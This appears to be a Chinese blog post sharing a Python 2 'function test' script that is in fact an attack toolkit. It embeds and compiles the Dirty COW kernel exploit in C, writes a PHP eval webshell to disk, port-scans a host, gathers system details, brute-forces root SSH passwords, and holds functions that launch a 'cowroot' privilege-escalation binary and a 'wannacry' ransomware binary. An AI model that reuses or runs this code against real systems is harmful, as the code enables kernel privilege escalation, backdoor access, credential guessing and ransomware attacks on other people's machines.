某一功能测试脚本

帮公司测试写的一个功能测试脚本。需要尽量少用第三方库，但其实还是用到了，连接ssh必须需要用到。

# coding:utf-8

import socket
import sys
import os
import paramiko
import subprocess
from subprocess import Popen,PIPE

print "\033[0;31m "
print '''

●●●█〓█████████▅▄▄▄▄▄▄▄▃▃▃▃▄ ●●
▄██ 〓█★    ★█ 〓 ██▄
[ @Author：2amor ]
▄▅██████████████████████▅▄▃
███████████████████████████◤
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙
'''
print "\033[0m"

# 漏洞利用验证代码
poc_code = """
/* 
 * main.c 
 * 
 *  Created on: Oct 21, 2016 
 *      Author: 5t4rk 
 */  
#include<stdio.h>  
#include<sys/mman.h>  
#include<fcntl.h>  
#include<pthread.h>  
#include<string.h>  
  
void *map;  
int f;  
struct stat st;  
char* name;  
  
void * madviseThread(void *arg)  
{  
    char *str;  
    str = (char *) arg;  
    int i, c = 0;  
    for (i = 0; i < 100000000; i++)  
    {  
        c += madvise(map, 100, MADV_DONTNEED);  
    }  
    printf("madvise %d\\n", c);  
}  
  
void * procselfmemThread(void *arg)  
{  
    char *str;  
    str = (char *) arg;  
    int f = open("/proc/self/mem", O_RDWR);  
    int i, c = 0;  
    for (i = 0; i < 100000000; i++)  
    {  
        lseek(f, map, SEEK_SET);  
        c += write(f, str, strlen(str));  
    }  
    printf("procselfmem %d\\n", c);  
}  
  
int main(int argc, char *argv[])  
{  
    if (argc < 3)  
        return 1;  
    pthread_t pth1, pth2;  
    f = open(argv[1], O_RDONLY);  
    fstat(f, &st);  
    name = argv[1];  
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);  
    printf("mmap %x\\n", map);  
    pthread_create(&pth1, NULL, madviseThread, argv[1]);  
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);  
    pthread_join(pth1, NULL);  
    pthread_join(pth2, NULL);  
    return 0;  
}  
"""
#临时文件内容
test_content = "noo"
def write_poc(code,file):
    with open(file,'w') as f:
        f.write(code)
# 编译poc
def mc_gcc(file):
    pobj = Popen('gcc '+file+" -lpthread -o mc_poc", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    result = pobj.communicate()
    return result
# 判断是否存在漏洞
def mc_vuln(file):
    pobj = Popen('cat '+file, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    result = pobj.communicate()
    return result[0]
# 执行poc
def mc_binx(file):
    pobj = Popen('./'+file+" mc_tmp yes|ps -ef|grep '[m]c_poc mc_tmp'|awk '{print $2}'|xargs kill -9", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    result = pobj.communicate()
    return result

# 扫描渗透溯源的端口
def scan_port(host):
    ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389, 8123]
    target_ip = socket.gethostbyname(host)
    for port in ports:
        print "port scanning is %s " % port
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)
        result = sock.connect_ex((target_ip, int(port)))
        if result == 0:
            print("open_port:" + str(port))


# 执行系统命令
def exec_system():
    print(os.system('whoami'))
    print(os.system('uname -a'))
    print(os.system('cat /proc/version'))
    print(os.system('cat /etc/crontab'))
    print(os.system('netstat -ntlp'))
    print(os.system('id'))
    print(os.system('ps -ef'))

# 生成脚本木马
def echo_webshell(path):
    path = path + 'webshell.php'
    if os.path.exists(path):
        os.remove(path)
    with open(path, 'w') as f:
        f.writelines("<?php @eval($_POST['cmd']);?>")
    if os.path.exists(path):
        print('生成脚本木马文件成功!')
    

# 远程连接ssh
def ssh_connect(host):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    password = ['toor', 'admin123', 'root123']
    for pwd in password:
        try:
            print(host, pwd)
            ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5)
            ssh.close()
            print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
        except paramiko.AuthenticationException, e:
            pass
            print("failed to connect ssh")

# 使用dirtycow提权
def get_root(path):
    path = path + 'cowroot5'
    os.system("sudo chmod +x %s" % path)
    os.system("%s" % path)

# 执行wannacry勒索脚本
def exec_wannacry(path):
    path = path + 'wannacry'
    os.system("chmod +x %s" % path)
    os.system("%s" % path)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('argument error')
        print("pip install -r requirements.txt")
        print('example:python checklist.py -h 127.0.0.1 -p /tmp/')
        exit(0)
    host = sys.argv[2]
    path = sys.argv[4]
    scan_port(host)
    echo_webshell(path)
    exec_system()
    write_poc(poc_code, 'mc_poc.c')
    write_poc(test_content, 'mc_tmp')
    mc_gcc('mc_poc.c')
    mc_binx('mc_poc')
    # print type(mc_vuln('mc_tmp'))
    if mc_vuln('mc_tmp') == 'yes':
        print 'The os is vulnerability!Please upgrade the kernel.'
    elif mc_vuln('mc_tmp') == 'noo':
        print 'You are Lucky dog~ No vuln.'
    #ssh_connect(host)
    # get_root(path)
    # exec_wannacry(path)

参考文献：

http://pirogue.org/2017/09/12/dirtycow/